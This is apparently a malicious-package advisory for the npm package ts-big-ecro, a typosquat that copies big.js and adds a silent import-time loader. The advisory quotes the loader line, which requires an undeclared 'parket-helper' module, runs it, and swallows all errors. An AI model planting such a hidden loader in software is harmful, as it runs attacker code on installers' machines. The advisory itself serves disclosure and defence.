MAL-2026-6199

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (09cc5687efdad86354f994af9fa7d7c28fbc21d7b5b4558870aba1c05dcf425b) ts-big-ecro is a verbatim copy of the legitimate big.js library (MikeMcl/big.js v7.0.1) with its name, repository field, and copyright preserved to impersonate the original. Inside the main module (big.js:606 and big.mjs:606), an attacker-inserted block runs at the top level on every require()/import of the package: `try { const doc = require("parket-helper"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. The call fires unconditionally, swallows all errors to evade detection, and loads `parket-helper` — a module that is not declared in dependencies, not documented anywhere, and unrelated to arbitrary-precision arithmetic. The package's only declared dependency is `server-parket@^3.8.1`, which is similarly unrelated to the package's stated purpose (the real big.js has zero runtime dependencies). The combination — typosquat name, verbatim impersonation of a popular library, import-time loader for an undeclared helper module, and a suspicious sibling dependency of a different name — is the standard dependency-confusion trojan-loader pattern. Any installer that requires this package executes attacker-controlled code from `parket-helper` in their process.